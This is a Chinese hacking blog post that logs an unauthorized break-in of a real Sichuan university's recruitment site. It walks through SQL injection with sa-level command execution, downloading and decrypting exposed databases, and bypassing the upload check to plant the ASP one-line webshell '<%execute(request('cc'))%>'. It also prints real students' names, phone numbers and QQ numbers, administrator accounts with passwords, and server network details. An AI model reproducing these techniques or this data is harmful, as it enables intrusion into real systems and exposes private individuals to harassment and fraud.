友情目标:四川师范大学文理学院
友情目标:四川师范大学文理学院
未深入.简单玩玩
===================================、
规则:静态。。 jsp
二级域名下有很多动态~~
125.71.200.234
http://125.71.200.244/ConfigWeb%5CIndex.aspx
GUID 应包含带 4 个短划线的 32 位数(xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx)。
过滤了
先分析下,不用急着C段
http://zfx.scnucas.com/ConfigWeb/Index.aspx 进入旧网站,架构ASPX
http://cache.baiducontent.com/c?
m=9f65cb4a8c8507ed4fece763105392230e54f7306792874e2f87cf1d84642c101a39fef060754643cec57a6204ac4958ede736056d457fe98f8dd50a8bb4c37e7edb6623716c914165c418df9c1062d621e04de9d80ee6caa16e84aea38d82010
896&p=9e759a41d38804be4ba8c7710f49&newp=882a9140808218e90ab0c7710f0592695803ed633dd5d6433e8dd51ace&user=baidu&fm=sc&query=cdcas.edu.cn+login&qid=d716b7e800055e58&p1=8
找到一些页面
zsjy.cdcas.edu.cn/system/about/NewsDetails.asp?Id=89 一处注入
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]将 varchar 值 '89 and 1=2' 转换为数据类型为 int 的列时发生语法错误。
/system/about/NewsDetails.asp,行 250
mssql Sa权限,别高兴太早。。。
我们看看能不能列目录
居然完全暴露了
http://zsjy.cdcas.edu.cn ; 出现注入的是这个,那么zsjy是个重点
那么我们爬行不到任何东西,先把网站路径找出来
http://zsjy.cdcas.edu.cn/system/ 跟进也没用
能执行命令mssql ,看看先
x-cmdshell
172.16.184.120 本地局域网。。难道还要我做个转发。。我也是内网呢,真麻烦
IUSR_20130909-1658 IWAM_20130909-1658 mysql
sqldebug SQLDebugger zsjyiis
命令运行完毕,但发生一个或多个错误。
E:\zsjyxy_20130315\adminuser\ 路径应该是这个,访问看看
http://zsjy.cdcas.edu.cn/_admin/login.asp G果然猜到后台了,那么既然二级都用这个,四川文理那个也跑不了
、
大部分学校都用这种思路,弱爆了
先看看域名情况
www.cdcas.edu.cn 解析了半天,没反应。。
cdcas.edu.cn:80 关闭
cdcas.edu.cn:8080 关闭
cdcas.edu.cn:3128 关闭
cdcas.edu.cn:8081 关闭
cdcas.edu.cn:9080 关闭
cdcas.edu.cn:1080 关闭
cdcas.edu.cn:21 关闭
cdcas.edu.cn:23 关闭
cdcas.edu.cn:443 关闭
cdcas.edu.cn:69 关闭
cdcas.edu.cn:22 关闭
cdcas.edu.cn:25 关闭
cdcas.edu.cn:110 关闭
cdcas.edu.cn:7001 关闭
cdcas.edu.cn:9090 关闭
cdcas.edu.cn:3389 关闭
cdcas.edu.cn:1521 关闭
cdcas.edu.cn:1158 关闭
cdcas.edu.cn:2100 关闭
cdcas.edu.cn:1433 关闭
其实这只是表面,换个思路看看
http://zsjy.cdcas.edu.cn/_admin/login.asp ; 这个系统很熟悉,一时间记不起名字
data/ 先把数据库猜下
wy.mdb
wb.mdb
http://zsjy.cdcas.edu.cn/data/wb.mdb ; 下载瞧瞧
还加了密的,果断解密
密码为qingsong
我还以为是什么呢
这些对我没用
bh xm mobilephone qq nbbc nbzy bz
3 你你 18978379273 87987897 职业鉴定 自学国贸 是国
4 赵莹莹 18108030543 职业鉴定 教师资格
5 袁畅 18202839851 1227535966 自学考试 自考法律
6 何柳 13795941385 474986170 自学考试 自考社工
7 蒋依伲 15882446721 693158025 自学考试 自考社工
8 张露怡 18202847707 704137759 自学考试 自考会计
9 赵鑫 18202843607 710012340 自学考试 自考会计
10 卿含芮 13707009379 894778511 自学考试 教师资格
11 毛倩颖 13980053927 289104028 自学考试 自考汉文
12 唐玉洁 15198236669 794147219 自学考试 自考会计
---------------------------------------------------------
继续下载
http://zsjy.cdcas.edu.cn/data/yzxx.mdb 什么也没有
http://zsjy.cdcas.edu.cn/data/data.accdb
http://zsjy.cdcas.edu.cn/data/wb%E6%95%B0%E6%8D%AE%E5%BA%93%E5%A4%87%E4%BB%BD.mdb
不用进后台,先通过SA备份一句话。再看看情况
<%execute(request("cc"))%>
路径
E:\zsjyxy_20130315\_admin\x.asp
尝试把内容写入文件: E:\zsjyxy_20130315\_admin\x.asp
---------------------------------------------------------------
<%execute(request("cc"))%>
看看写进去没
没写进去?http://zsjy.cdcas.edu.cn/_admin.zip
http://zsjy.cdcas.edu.cn/_adminbackup/login.asp
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e4d'
[Microsoft][ODBC SQL Server Driver][SQL Server]用户 'sa' 登录失败。
/_adminbackup/_Conn_admin.asp,行 6
写了1都无法写入?
Windows IP Configuration
路径
E:\zsjyxy_20130315\_admin\x.asp
尝试把内容写入文件: E:\zsjyxy_20130315\_admin\x.asp
---------------------------------------------------------------
<%execute(request("cc"))%>
看看写进去没
没写进去?http://zsjy.cdcas.edu.cn/_admin.zip
http://zsjy.cdcas.edu.cn/_adminbackup/login.asp
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e4d'
[Microsoft][ODBC SQL Server Driver][SQL Server]用户 'sa' 登录失败。
/_adminbackup/_Conn_admin.asp,行 6
写了1都无法写入?
Windows IP Configuration
Host Name . . . . . . . . . . . . : 20130909-1658
Node Type . . . . . . . . . . . . : Broadcast
IP Routing Enabled. . . . . . . . : Yes
WINS Proxy Enabled. . . . . . . . : Yes
Description . . . . . . . . . . . : Realtek PCIe GBE Family Controller
Physical Address. . . . . . . . . : 74-27-EA-B8-BD-E7
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 172.16.184.120
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.184.254
DNS Servers . . . . . . . . . . . : 61.139.2.69
==========================================================================
猜出来了,用户admin 密码qingsong
http://zsjy.cdcas.edu.cn/adminuser/
好蛋痛
、
admin
天父地母
√
admin
√
修改|锁定|解锁
chenfei
leo280
√
陈飞
√
修改|锁定|解锁
yangyang
leo280
√
杨洋
√
修改|锁定|解锁
chenbo
admin
√
陈波
√
修改|锁定|解锁
lijiefeng
admin
√
李界峰
√
修改|锁定|解锁
xusihui
admin
√
许思辉
√
修改|锁定|解锁
汗,果断点
http://zsjy.cdcas.edu.cn/images/Flash/upfile_flash.asp
上传漏洞
抓个包包
取得 cookie
Cookie: ASPSESSIONIDQCBDSAAB=GJMLKHDCFNDNGHFEDMMDDEMC
HTTP/1.1 200 OK
Date: Wed, 20 May 2015 12:40:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 258
Content-Type: text/html
Cache-control: private
201552020402339228.jpg201552020402339228.jpgnihao.jpg
上传成
功!<br><script>window.opener.document...value='201552020402339228.jpg'</script>
<script language="javascript">
window.alert("文件上传成功!请不要修改生成的链接地址!");
window.close();
</script>
不知道用NC截断行不行..
貌似有点问题
burp看看
<img border=0 src="/uploads/2015520/20150520204572927292.png"> 路径在这
-----------------------------7df1fc316b0d4e
Content-Disposition: form-data; name="file1"; filename="C:\Documents and Settings\Administrator\×ÀÃæ\bd_jpg.asp"
Content-Type: image/x-png
奇葩
呵呵,笑了
看看
big.jpg.asp这种可以绕过检查,直接得到小马,路径找了半天,在这
http://zsjy.cdcas.edu.cn/images/Flash/201552020474540172.asp
我传的,,接下来,你懂的
http://zsjy.cdcas.edu.cn/images/Flash/xxx.asp 成功得到shell
http://zsjy.cdcas.edu.cn/images/Flash/j.asp
8 [管理员用户]账号名: Administrator
账号名: SQLDebugger
C:\360Rec 可读,可写。
读下iis.vbs
上传CMD缺少对象,直接到菜刀。。传
http://zsjy.cdcas.edu.cn/x.asp
Microsoft (R) Windows Script Host Version 5.7
版权所有(C) Microsoft Corporation 1996-2001。保留所有权利。
默认网站 IUSR_20130909-1658 46[&+{(6']w|L\ :80: E:\zsjyxy_20130315
from : http://www.xxx.com/ ;
我就不说了。。
======================================
内网我没兴趣。。。改天再看看其他的文理站,要睡觉了。
<< 上一篇
下一篇 >>